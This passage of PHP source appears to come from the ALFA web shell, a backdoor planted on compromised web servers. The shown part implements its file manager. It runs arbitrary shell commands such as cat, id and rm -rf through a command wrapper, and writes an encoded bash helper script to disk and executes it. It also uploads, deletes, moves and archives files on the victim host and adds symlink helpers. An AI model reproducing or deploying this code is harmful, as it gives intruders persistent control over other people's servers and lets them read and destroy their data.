3415$i .= (($p & 0x0004) ? 'r' : '-');
3416$i .= (($p & 0x0002) ? 'w' : '-');
3417$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
3418return $i;
3419}
3420function alfaPermsColor($f,$isbash=false){
3421$class = "";
3422$num = "";
3423$human = "";
3424if($isbash){
3425$class = $f["class"];
3426$num = $f["num"];
3427$human = $f["human"];
3428}else{
3429$num = substr(sprintf('%o', @fileperms($f)),-4);
3430$human = alfaPerms(@fileperms($f));
3431if(!@is_readable($f))
3432$class = "main_red_perm";
3433elseif (!@is_writable($f))
3434$class = "main_white_perm";
3435else
3436$class = "main_green_perm";
3437}
3438return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';
3439}
3440if(!function_exists("scandir")) {
3441function scandir($dir) {
3442$dh = opendir($dir);
3443while (false !== ($filename = readdir($dh)))
3444$files[] = $filename;
3445return $files;
3446}
3447}
3448function reArrayFiles($file_post){
3449$file_ary = array();
3450$file_count = count($file_post['name']);
3451$file_keys = array_keys($file_post);
3452for ($i=0; $i<$file_count; $i++) {
3453foreach ($file_keys as $key) {
3454$file_ary[$i][$key] = $file_post[$key][$i];
3455}
3456}
3457return $file_ary;
3458}
3459function _alfa_can_runCommand($cgi=true,$cache=true){
3460 if(isset($_COOKIE["alfa_canruncmd"])&&$cache){
3461 return true;
3462 }
3463 if(strlen(alfaEx("whoami",false,$cgi))>0){
3464 $_COOKIE["alfa_canruncmd"] = true;
3465 return true;
3466 }
3467 return false;
3468}
3469function _alfa_symlink($target, $link){
3470 $phpsym = function_exists("symlink");
3471 if($phpsym){
3472 @symlink($target, $link);
3473 }else{
3474 alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
3475 }
3476}
3477function _alfa_file_exists($file,$cgi=true){
3478 if(@file_exists($file)){
3479 return true;
3480 }else{
3481 if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
3482 return true;
3483 }
3484 }
3485 return false;
3486}
3487function _alfa_file($file,$cgi=true){
3488 $array = @file($file);
3489 if(!$array){
3490 if(strlen(alfaEx("id",false,$cgi))>0){
3491 $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
3492 if(strlen($data)>0){
3493 return explode("\n", $data);
3494 }else{
3495 return false;
3496 }
3497 }else{
3498 return false;
3499 }
3500 }else{
3501 return $array;
3502 }
3503}
3504function _alfa_is_writable($file){
3505 $check = false;
3506 $check = @is_writable($file);
3507 if(!$check){
3508 if(_alfa_can_runCommand()){
3509 $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
3510 if($check == "yes"){
3511 $check = true;
3512 }else{
3513 $check = false;
3514 }
3515 }
3516 }
3517 return $check;
3518}
3519function _alfa_is_dir($dir,$mode="-d"){
3520 $check = false;
3521 $check = @is_dir($dir);
3522 if($mode == "-e"){
3523 $check = @is_file($dir);
3524 }
3525 if(!$check){
3526 if(_alfa_can_runCommand()){
3527 $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
3528 if($check == "yes"){
3529 return true;
3530 }else{
3531 return false;
3532 }
3533 }
3534 }
3535 return $check;
3536}
3537function _alfa_load_ace_options($base){
3538 return '<span>Theme: </span><select class="ace-controler ace-theme-selector" base="'.$base.'" onChange="alfaAceChangeSetting(this,\'theme\');"><option value="terminal" selected>terminal</option><option value="ambiance">ambiance</option><option value="chaos">chaos</option><option value="chrome">chrome</option><option value="clouds">clouds</option><option value="clouds_midnight">clouds_midnight</option><option value="cobalt">cobalt</option><option value="crimson_editor">crimson_editor</option><option value="dawn">dawn</option><option value="dracula">dracula</option><option value="dreamweaver">dreamweaver</option><option value="eclipse">eclipse</option><option value="github">github</option><option value="gob">gob</option><option value="gruvbox">gruvbox</option><option value="idle_fingers">idle_fingers</option><option value="iplastic">iplastic</option><option value="katzenmilch">katzenmilch</option><option value="kr_theme">kr_theme</option><option value="kuroir">kuroir</option><option value="merbivore">merbivore</option><option value="merbivore_soft">merbivore_soft</option><option value="mono_industrial">mono_industrial</option><option value="monokai">monokai</option><option value="nord_dark">nord_dark</option><option value="pastel_on_dark">pastel_on_dark</option><option value="solarized_dark">solarized_dark</option><option value="solarized_light">solarized_light</option><option value="sqlserver">sqlserver</option><option value="textmate">textmate</option><option value="tomorrow">tomorrow</option><option value="tomorrow_night">tomorrow_night</option><option value="tomorrow_night_blue">tomorrow_night_blue</option><option value="tomorrow_night_bright">tomorrow_night_bright</option><option value="tomorrow_night_eighties">tomorrow_night_eighties</option><option value="twilight">twilight</option><option value="vibrant_ink">vibrant_ink</option><option value="xcode">xcode</option></select><span>Language: </span><select class="ace-controler" base="'.$base.'" onChange="alfaAceChangeSetting(this,\'lang\');"><option value="php">php</option><option value="python">python</option><option value="perl">perl</option><option value="c_cpp">c/c++</option><option value="csharp">c#</option><option value="ruby">ruby</option><option value="html">html</option><option value="javascript">javascript</option><option value="css">css</option><option value="xml">xml</option><option value="sql">sql</option><option value="swift">swift</option><option value="sh">bash</option><option value="lua">lua</option><option value="powershell">powershell</option><option value="jsp">jsp</option><option value="java">java</option><option value="json">json</option><option value="plain_text">plain_text</option></select><span>Soft Wrap: </span><input type="checkbox" name="wrapmode" class="ace-controler" onClick="alfaAceChangeWrapMode(this,\''.$base.'\');" checked> | <span>Font Size: </span><button class="ace-controler" style="cursor:pointer;" onclick="alfaAceChangeFontSize(\''.$base.'\',\'+\', this);return false;">+</button> | <button style="cursor:pointer;" class="ace-controler" onclick="alfaAceChangeFontSize(\''.$base.'\', \'-\', this);return false;">-</button> | ';
3539}
3540function alfaFilesMan2(){
3541 alfahead();
3542 AlfaNum(8,9,10,7,6,5,4);
3543 echo '<div style="position:relative;" id="filesman_holder" class="ajaxarea"><div class="header"></div></div>';
3544 alfaFooter();
3545}
3546function copy_paste($c,$s,$d){
3547if(@is_dir($c.$s)){
3548@mkdir($d.$s);
3549$h = @opendir($c.$s);
3550while (($f = @readdir($h)) !== false)
3551if (($f != ".") and ($f != ".."))
3552copy_paste($c.$s.'/',$f, $d.$s.'/');
3553} elseif(is_file($c.$s))
3554@copy($c.$s, $d.$s);
3555}
3556function alfaFilesMan(){
3557if(!empty ($_COOKIE['alfa_f']))
3558$_COOKIE['alfa_f'] = @unserialize($_COOKIE['alfa_f']);
3559if(!empty($_POST['alfa1'])){
3560switch($_POST['alfa1']){
3561case 'uploadFile':
3562$move_cmd_file = false;
3563$alfa_canruncmd = false;
3564if($GLOBALS['glob_chdir_false']){
3565 $alfa_canruncmd = _alfa_can_runCommand(true,true);
3566 $move_cmd_file = true;
3567}
3568if(_alfa_is_writable($GLOBALS['cwd'])){
3569$files = reArrayFiles($_FILES['f']);
3570$ret_files = array();
3571foreach($files as $file){
3572if($move_cmd_file&&$alfa_canruncmd){
3573 alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
3574}else{
3575 if(@move_uploaded_file($file['tmp_name'],$file['name'])){
3576 $ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($file['name'])):array("name" => "????");
3577 $gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($file['name'])):array("name" => "????");
3578 $file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($file['name']):"????");
3579 $file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($file['name']):"????");
3580 $file_modify = @date('Y-m-d H:i:s', @filemtime($file['name']));
3581 $file_perm = alfaPermsColor($file['name']);
3582 $file_size = @filesize($file['name']);
3583 $ret_files[] = array("name" => $file['name'], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner."/".$file_group);
3584 }
3585}
3586}
3587if(!$move_cmd_file){
3588 echo json_encode($ret_files);
3589}
3590}else{
3591 echo "noperm";
3592 return;
3593}
3594if(!$move_cmd_file){
3595return;
3596}
3597break;
3598case 'mkdir':
3599$new_dir_cmd = false;
3600if($GLOBALS['glob_chdir_false']){
3601 if(_alfa_can_runCommand(true,true)){
3602 if(_alfa_is_writable($GLOBALS['cwd'])){
3603 if(!_alfa_is_dir(trim($_POST['alfa2']))){
3604 alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
3605 echo "<script>alfaShowNotification('".addslashes($_POST['alfa2'])." created...', 'Files manager');</script>";
3606 }else{
3607 echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
3608 }
3609 }else{
3610 echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
3611 }
3612 }else{
3613 echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>";
3614 }
3615}else{
3616 if(_alfa_is_writable($GLOBALS['cwd'])){
3617 if(!_alfa_is_dir(trim($_POST['alfa2']))){
3618 if(!@mkdir(trim($_POST['alfa2']))){
3619 echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>";
3620 }else{
3621 echo "<script>alfaShowNotification('".addslashes($_POST['alfa2'])." created...', 'Files manager');</script>";
3622 }
3623 }else{
3624 echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
3625 }
3626 }else{
3627 echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
3628 }
3629}
3630break;
3631case 'delete':
3632function deleteDir($path){
3633$path = (substr($path,-1)=='/') ? $path:$path.'/';
3634$dh = @opendir($path);
3635while(($item = @readdir($dh)) !== false){
3636$item = $path.$item;
3637if((basename($item) == "..") || (basename($item) == "."))
3638continue;
3639$type = @filetype($item);
3640if ($type == "dir")
3641deleteDir($item);
3642else
3643@unlink($item);
3644}
3645@closedir($dh);
3646@rmdir($path);
3647}
3648if(is_array(@$_POST['f']))
3649foreach($_POST['f'] as $f){
3650if($f == '..')
3651continue;
3652$f = rawurldecode($f);
3653if($GLOBALS["glob_chdir_false"]){
3654 if(_alfa_can_runCommand(true,true)){
3655 alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
3656 }
3657}else{
3658alfaEx("rm -rf '".addslashes($f)."'",false,false);
3659if(@is_dir($f))
3660deleteDir($f);
3661else
3662@unlink($f);
3663}
3664}
3665if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
3666deleteDir(rawurldecode(@$_POST['alfa2']));
3667alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
3668}else{
3669@unlink(rawurldecode(@$_POST['alfa2']));
3670}
3671if($GLOBALS["glob_chdir_false"]){
3672 $source = rawurldecode(@$_POST['alfa2']);
3673 if($source!='..'&&!empty($source)){
3674 if(_alfa_can_runCommand(true,true)){
3675 alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
3676 }
3677 }
3678}
3679if(is_array($_POST['f']))
3680return;
3681break;
3682case 'paste':
3683if($_COOKIE['alfa_act'] == 'copy'&&isset($_COOKIE['alfa_f'])){
3684foreach($_COOKIE['alfa_f'] as $f)
3685copy_paste($_COOKIE['alfa_c'],$f, $GLOBALS['cwd']);
3686}elseif($_COOKIE['alfa_act'] == 'move'&&isset($_COOKIE['alfa_f'])){
3687function move_paste($c,$s,$d){
3688if(@is_dir($c.$s)){
3689@mkdir($d.$s);
3690$h = @opendir($c.$s);
3691while (($f = @readdir($h)) !== false)
3692if(($f != ".") and ($f != ".."))
3693copy_paste($c.$s.'/',$f, $d.$s.'/');
3694}elseif(@is_file($c.$s))
3695@copy($c.$s, $d.$s);
3696}
3697foreach($_COOKIE['alfa_f'] as $f)
3698@rename($_COOKIE['alfa_c'].$f, $GLOBALS['cwd'].$f);
3699}elseif($_COOKIE['alfa_act'] == 'zip'&&isset($_COOKIE['alfa_f'])){
3700if(class_exists('ZipArchive')){
3701$zip = new ZipArchive();
3702$zipX = "alfa_".rand(1,1000).".zip";
3703if($zip->open($zipX, 1)){
3704@chdir($_COOKIE['alfa_c']);
3705foreach($_COOKIE['alfa_f'] as $f){
3706if($f == '..')continue;
3707if(@is_file($_COOKIE['alfa_c'].$f))
3708$zip->addFile($_COOKIE['alfa_c'].$f, $f);
3709elseif(@is_dir($_COOKIE['alfa_c'].$f)){
3710$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
3711foreach($iterator as $key=>$value){
3712$key = str_replace('\\','/',realpath($key));
3713if(@is_dir($key)){
3714if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
3715}else{$zip->addFile($key,$key);}}}}
3716@chdir($GLOBALS['cwd']);
3717$zip->close();
3718__alert('>> '.$zipX.' << is created...');}}
3719}elseif($_COOKIE['alfa_act'] == 'unzip'&&isset($_COOKIE['alfa_f'])){
3720if(class_exists('ZipArchive')){
3721$zip = new ZipArchive();
3722foreach($_COOKIE['alfa_f'] as $f) {
3723if($zip->open($_COOKIE['alfa_c'].$f)){
3724$zip->extractTo($_COOKIE['alfa_cwd']);
3725$zip->close();}}}}
3726unset($_COOKIE['alfa_f']);
3727break;
3728default:
3729if(!empty($_POST['alfa1'])){
3730if(in_array($_POST['alfa1'], array("copy", "move", "zip", "unzip"))){
3731__alfa_set_cookie('alfa_act', @$_POST['alfa1']);
3732__alfa_set_cookie('alfa_f', @serialize($_POST['f']));
3733__alfa_set_cookie('alfa_c', @$_POST['c']);
3734return;
3735}
3736}
3737break;
3738}
3739}
3740$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
3741if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
3742 $path = explode('/', $res[1]);
3743 array_pop($path);
3744 $_POST['c'] = implode('/', $path);
3745}
3746$cmd_dir = false;
3747if($dirContent === false){
3748 if(_alfa_can_runCommand(true,true)){
3749 $tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"];
3750 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
3751 if(!isset($_COOKIE["alfachdir_bash"])||@!file_exists($tmp_getdir_path."/alfacgiapi/getdir.alfa")){
3752 $bash = "jZRbb9owFMefyac4c50GRBGwG1IgD5OmTn3dtIcJUOUmDrGW2MgJStMUae/7lv0ktR0ngYpJ48HYv/+5+HJOrt5ND7mcPjA+zRPn6933AM+du9sfAfY23HNomAhAa+TEQgIDxgEP0xwmBLCyHS0hEg6o354USYA0m2KGnAHjsQjwMC9IAZMQkHvruz9995vv5r77y5+5xHe/IMDab+QMdELP90BSEsFE6vhESlLBarUChHU0FbSo9jTAtVHWs+3RZBYlp7Kjc0t3Uhz2HX2v6CBnT733B00yEbG46thH67unMuOHrOOfTnhyyAjvlM9W4bS871XPM1Df2HAIjAWzpRpXuL7qbI6ajMcw6m/wTZSxus26W/mYMX9+fPnzFxnjSHD6dk9n7uoFYliv1QU3h4EgADSbLxYLBNvtEoqEKptBe1Q004oFTTwUSZWufFSDLNXwKEtlELM28qRUD6OfTweE62vD5Ak7SxKKVMgAZYTx+52klJutqoA0teH+y7VMWEF715xesJE0ai363WJdO+YSIiZpWAhZnSUypaW1ky31PpLuDimRELOUmuM+P182oNm+qP5tllfZg0hZCCnjvy/kN47Ntk3j1RvESUY3yIeN6oINulH/2tSSZqqh6QJL7Vxj0wYW27nGuhUsbaYaNt1gcbvQgi0Sq3SrVjLlciLadSubpzmR7fp445gibj4w9XGLXgE=";
3753 $tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa",$bash);
3754 __alfa_set_cookie("alfachdir_bash", "true");
3755 __alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path);
3756 }
3757 $dirContent = alfaEx("cd ".$tmp_getdir_path."/alfacgiapi;sh getdir.alfa '".addslashes(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd'])."'");
3758 $dirContent = json_decode($dirContent, true);
3759 if(is_array($dirContent)){
3760 array_pop($dirContent);
3761 $cmd_dir = true;
3762 }else{
3763 $dirContent = false;
3764 }
3765 }
3766}
3767alfahead();
3768AlfaNum(8,9,10,7,6,5,4);
3769$count_dirContent = @count($dirContent);
3770if($count_dirContent > 300){
3771 @$_COOKIE["alfa_limited_files"] = 100;
3772}
3773$alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : 'name';
3774$alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int)$_COOKIE["alfa_limited_files"] : 0;
3775$alfa_files_page_number = isset($_POST["pagenum"]) ? (int)$_POST["pagenum"] : 1;
3776$alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : 'asc';
3777$files_page_count = 1;
3778if($alfa_limited_files > 0){
3779 $files_page_count = ceil($count_dirContent/$alfa_limited_files);
3780 if($files_page_count > 1){
3781 $files_page_count++;
3782 }
3783}
3784echo '<div class="ajaxarea"><div class="filters-holder"><span>Filter: </span><input style="color:#25ff00;" autocomplete="off" type="text" id="regex-filter" name="name-filter" onkeydown="doFilterName(this);"><span style="margin-left:10px">Sort By: </span><select name="sort_files" onchange="sortBySelectedValue(this,\'alfa_sort_by\');" style="color:#25ff00;"><option value="name" '.($alfa_sort_by == 'name'?'selected':'').'>Name</option><option value="size" '.($alfa_sort_by == 'size'?'selected':'').'>Size</option><option value="modify" '.($alfa_sort_by == 'modify'?'selected':'').'>Modify</option></select><span style="margin-left:10px">Direction: </span><select name="direction_filesman" onChange="sortBySelectedValue(this,\'alfa_filesman_direction\')" style="color:#25ff00;"><option value="asc" '.($alfa_filesman_direction == 'asc'?'selected':'').'>Ascending</option><option value="desc" '.($alfa_filesman_direction == 'desc'?'selected':'').'>Descending</option></select><span style="margin-left:10px;"> limit: </span><input style="text-align:center;width: 40px;color:#25ff00;" type="text" name="limited_number" value="'.$alfa_limited_files.'" oninput="this.value=this.value.replace(/[^0-9]/g,\'\');setCookie(\'alfa_limited_files\', this.value, 2012);"><span style="margin-left:10px;">Files Count: <b style="color:#25ff00;">'.($count_dirContent-1).'</b></span></div><div class="header">';
3785if($dirContent == false){
3786echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
3787alfaFooter();
3788return;
3789}
3790global $sort;
3791$sort = array('name', 1);
3792if(isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])){
3793 $sort[0] = $_COOKIE["alfa_sort_by"];
3794}
3795if(!empty($_POST['alfa1'])) {
3796if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
3797$sort = array($match[1], (int)$match[2]);
3798}
3799if($alfa_files_page_number > ($files_page_count-1)){
3800 $alfa_files_page_number = 1;
3801}
3802echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table id='filemanager_table' width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
3803$dirs = $files = array();
3804$n = $count_dirContent;
3805if($n > $alfa_limited_files && $alfa_limited_files > 0){
3806 $n = ($alfa_limited_files * $alfa_files_page_number);
3807 if($n > $count_dirContent){
3808 $n = $count_dirContent;
3809 }
3810}
3811$i = 0;
3812if($alfa_limited_files > 0 && $alfa_files_page_number > 1){
3813 $i = $alfa_limited_files * ($alfa_files_page_number - 1);
3814}
3815$page_builder = get_pagination_links($alfa_files_page_number,$files_page_count -1);
3816for(;$i<$n;$i++){
3817if($cmd_dir){
3818$filename = $dirContent[$i]["name"];
3819$file_owner = $dirContent[$i]["owner"];
3820$file_group = $dirContent[$i]["group"];
3821$file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
3822$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);
3823$file_size = $dirContent[$i]["size"];
3824$file_path = $GLOBALS['cwd']."/".$dirContent[$i]["name"];
3825}else{
3826$filename = $dirContent[$i];
3827$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");
3828$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");
3829$file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");
3830$file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");
3831$file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
3832$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
3833$file_size = @filesize($GLOBALS['cwd'].$filename);
3834$file_path = $GLOBALS['cwd'].$filename;
3835}
3836$tmp = array('name' => $filename,
3837'path' => $file_path,
3838'modify' => $file_modify,
3839'perms' => $file_perm,
3840'size' => $file_size,
3841'owner' => $file_owner,
3842'group' => $file_group
3843);
3844if($filename == ".."){
3845 $tmp["path"] = str_replace("\\", "/", realpath($file_path));
3846}
3847if(!$cmd_dir){
3848if(@is_file($file_path)){
3849$arr_mrg = array('type' => 'file');
3850if(@is_link($file_path)){
3851$arr_mrg["link"] = readlink($tmp['path']);
3852}
3853$files[] = array_merge($tmp, $arr_mrg);
3854}elseif(@is_link($file_path)){
3855$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
3856}elseif(@is_dir($file_path)&& ($filename != ".")){
3857$dirs[] = array_merge($tmp, array('type' => 'dir'));
3858}
3859}else{
3860 if($dirContent[$i]["type"]=="file"){
3861 $files[] = array_merge($tmp, array('type' => 'file'));
3862 }else{
3863 if($dirContent[$i]["name"] != "."){
3864 $dirs[] = array_merge($tmp, array('type' => 'dir'));
3865 }
3866 }
3867}
3868}
3869$GLOBALS['sort'] = $sort;
3870function alfaCmp($a, $b) {
3871if($GLOBALS['sort'][0] != 'size')
3872return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
3873else
3874return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
3875}
3876usort($files, "alfaCmp");
3877usort($dirs, "alfaCmp");
3878if(isset($_COOKIE["alfa_filesman_direction"])&& !empty($_COOKIE["alfa_filesman_direction"])){
3879 if($_COOKIE["alfa_filesman_direction"] == 'desc'){
3880 $files = array_reverse($files);
3881 $dirs = array_reverse($dirs);
3882 }
3883}
3884$files = array_merge($dirs, $files);
3885$l=0;
3886$cc=0;
3887foreach($files as $f){
3888$f['name'] = htmlspecialchars($f['name']);
3889$newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];
3890$checkbox = 'checkbox'.$cc;
3891$raw_name = rawurlencode($f['name']);
3892$icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
3893$style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';
3894echo '<tr class="fmanager-row" id="tr_row_'.$cc.'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td id="td_row_'.$cc.'">'.$icon.'<div style="'.$style.'"><a row="'.$cc.'" id="id_'.$cc.'" class="main_name" onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');" href="#action=fileman&path='.$GLOBALS['cwd'].'&file='.$raw_name.'" fname="'.$raw_name.'" ftype="file" path="'.$GLOBALS['cwd'].'" opt_title="'.$f['link'].'" '.(isset($f['link'])?'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this);"':'').'>'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" href="#action=fileman&path='.$f['path'].'" fname="'.$raw_name.'" ftype="folder" path="'.$GLOBALS['cwd'].'" opt_title="'.$f['link'].'" '.(isset($f['link'])?'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this);"':'').'><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?(isset($f['link'])?'[L] ':'').alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a id="id_chmode_'.$cc.'" href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.
3895$f['perms'].'</td><td><a id="id_rename_'.$cc.'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a id="id_touch_'.$cc.'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a id="id_edit_'.$cc.'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a id="id_download_'.$cc.'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a id="id_delete_'.$cc.'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';
3896$l = $l?0:1;
3897$cc++;
3898}
3899echo "<tr id='filemanager_last_tr'><td colspan=7>
3900<input type=hidden name=a value='FilesMan'>
3901<input type=hidden name=c value='".htmlspecialchars(($GLOBALS['glob_chdir_false']?$_POST['c']:$GLOBALS['cwd']))."'>
3902<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
3903<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
3904<input type='submit' value=' '>
3905</form></table><div class='pages-holder'><div class='pages-number'>".$page_builder."</div></div></div></div>";
3906alfafooter();
3907}
3908function get_pagination_links($current_page, $total_pages){
3909 $links = "";
3910 if ($total_pages >= 1 && $current_page <= $total_pages) {
3911 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\"><<</a>";
3912 $selected_page = "";
3913 if($current_page == 1){
3914 $selected_page = " active-page-number";
3915 }
3916 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">1</a>";
3917 $i = max(2, $current_page - 5);
3918 if ($i > 2)
3919 $links .= "<a class=\"page-number\">...</a>";
3920 for (; $i < min($current_page + 6, $total_pages); $i++) {
3921 if($i == $current_page){
3922 $selected_page = " active-page-number";
3923 }else{
3924 $selected_page = "";
3925 }
3926 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">{$i}</a>";
3927 }
3928 if ($i != $total_pages)
3929 $links .= "<a class=\"page-number\">...</a>";
3930 $selected_page = " last-page-number";
3931 if($current_page == $total_pages){
3932 $selected_page .= " active-page-number";
3933 }
3934 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">{$total_pages}</a>";
3935 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\">>></a>";
3936 }
3937 return $links;
3938}
3939function alfaFilesTools(){
3940alfahead();
3941echo '<div class="filestools" style="height: 100%;">';
3942if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
3943$alfa1_decoded = $_POST['alfa1'];
3944$chdir_fals = false;
3945if(!@chdir($_POST['c'])){
3946 $chdir_fals = true;
3947 $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
3948 $alfa_canruncmd = _alfa_can_runCommand(true,true);
3949 if($alfa_canruncmd){
3950 $slashed_alfa1 = addslashes($_POST['alfa1']);
3951 $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
3952 $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
3953 }
3954}
3955if($_POST['alfa2'] == 'auto'){
3956if(is_array(@getimagesize($_POST['alfa1']))){
3957$_POST['alfa2'] = 'image';
3958}else{
3959 $_POST['alfa2'] = 'view';
3960 if($chdir_fals){
3961 if($alfa_canruncmd){
3962 $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
3963 $mimetype = $mime[1];
3964 if(!empty($mimetype)){
3965 if(strstr($mimetype, "image")){
